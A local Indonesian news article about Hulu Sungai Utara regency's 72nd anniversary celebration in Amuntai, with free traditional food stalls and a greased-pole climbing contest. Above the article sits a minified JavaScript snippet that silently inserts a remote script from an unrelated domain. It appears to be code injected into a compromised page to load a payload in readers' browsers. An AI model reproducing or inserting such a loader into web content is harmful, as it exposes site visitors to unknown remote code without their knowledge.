(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
LIPSUS HARI JADI KABUPATEN HSU

Kuliner Gratis dan Panjat Pinang Warnai Hari Jadi ke-72 Kabupaten HSU


KANALKALIMANTAN.COM, AMUNTAI – Ribuan warga mendatangi lokasi peringatan Hari Jadi ke-72 Kabupaten Hulu Sungai Utara (HSU) di kawasan Lapangan Pahlawan Amuntai, Kamis (2/5/2024) siang.

Mereka yang datang bukan hanya untuk menyaksikan seremonial peringatan Hari Jadi ke-72 Kabupaten HSU, namun juga datang untuk menikmati kuliner gratis yang disediakan.

Tampak warga antusias menicicipi kuliner tradisional secara cuma-cuma dengan rela mengantre panjang meski kondisi terik panas.

Baca juga: Sejarah 1 Mei 1952 : Dari Afdeeling Amoentai Menjadi Kabupaten Hulu Sungai Utara

Kue khas Amuntai seperti Pais Sagu, Apam Hambuku, dan Cincin Talipuk menjadi bagian ragam kuliner di jajaran puluhan stand yang tersedia.

Salah seorang warga bernama Hairani (30) asal Desa Hambuku Tengah, Kecamatan Sungai Pandan sengaja datang untuk mencicipi kuliner yang disediakan secara gratis. “Aku pilih makanan pais sagu dan puracit,” ungkapnya.

Menu yang disediakan stand jajaran SKPD di lingkungan Pemkab HSU dan perbankan sebagian besar adalah kuliner khas daerah.

Baca juga: Unjuk Rasa Mahasiswa di Rumah Banjar, Komersialisasi Dunia Pendidikan Jadi Sorotan

Baca juga: DBD di Banjarbaru Tak Mengenal Musim, 366 Kasus Periode Januari-April

Sekda HSU Adi Lesmana, mengatakan, untuk kuliner khas disiapkan SKPD-SKPD yang ada di lingkup Pemkab HSU. “Ragam kuliner khas Amuntai gratis tersedia di Lapangan Pahlawan Amuntai,” katanya.

Selain disediakan kuliner khas Amuntai, pada rangkaian puncak peringatan Hari Jadi ke-72 HSU juga ada atraksi panjat pinang.

Baca juga: Peringati Hari Tari Sedunia, Ratusan Penari Tampil di Taman Budaya Kalsel

“Panjat pinang dari 10 kecamatan berlangsung di Lapangan Pahlawan Amuntai setelah rangkaian apel puncak peringatan selesai,” kata Sekda Adi Lesmana.

Beberapa kegiatan tersebut diharapkan masyarakat umum ikut langsung menyaksikan ke Lapangan Pahlawan Amuntai untuk turut meramaikan.

Baca juga: Jembatan Pulau Telo Tertabrak Kapal Pembawa Crane, Pj Bupati Cek Kondisi

Puncak peringatan Hari Jadi ke-72 Kabupaten HSU dihadiri Gubernur Kalsel H Sahbirin Noor dan Ketua Tim Penggerak PKK Provinsi Kalsel Hj Raudhatul Jannah.

Setelah serimonial puncak peringatan Hari Jadi ke-72 Kabupaten HSU, Gubernur Kalsel dan istri bersama Pj Bupati HSU Zakly Asswan melihat langsung panjat pinang dan meninjau stand kuliner. (Kanalkalimantan.com/dew)

Reporter : dew
Editor : bie


Muhammad Andi

Recent Posts

Instansi Vertikal Disiapkan Masuk SKPD Instansi Mengajar di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dinas Pendidikan (Disdik) Kota Banjarbaru siap menggandeng instansi vertikal di Kota Banjarbaru,… Read More

48 menit ago

780 Anggota PPK se Kalsel Dilantik, Bertugas 8 Bulan

KANALKALIMANTAN.COM, BANJARBARU - Seluruh Panitia Pemilihan Kecamatan (PPK) di Provinsi Kalimantan Selatan (Kalsel) resmi dilantik… Read More

59 menit ago

25 Anggota PPK Kota Banjarbaru Dilantik, Langsung Bekerja Membentuk Sekretariat

KANALKALIMANTAN.COM, BANJARBARU - Komisi Pemilihan Umum (KPU) Kota Banjarbaru resmi melantik 25 orang anggota Panitia… Read More

5 jam ago

Kearifan Lokal Kalsel Harus Dibaca dan Ditulis Generasi Muda

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Perpustakaan dan Kearsipan Provinsi Kalimantan Selatan (Kalsel) menggelar acara sosialisasi budaya… Read More

16 jam ago

Sekda HSU Sampaikan Raperda Pertanggungjawaban Pelaksanaan APBD 2023, Ini Angka Detailnya

KANALKALIMANTAN.COM, AMUNTAI - Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi Lesmana menyebut capaian target… Read More

17 jam ago

Permudah Kebutuhan Transaksi Jemaah Haji di Tanah Suci dengan BRImo

KANALKALIMANTAN.COM- Ibadah haji merupakan salah satu impian bagi umat Islam di seluruh dunia. Agar ibadah… Read More

18 jam ago

This website uses cookies.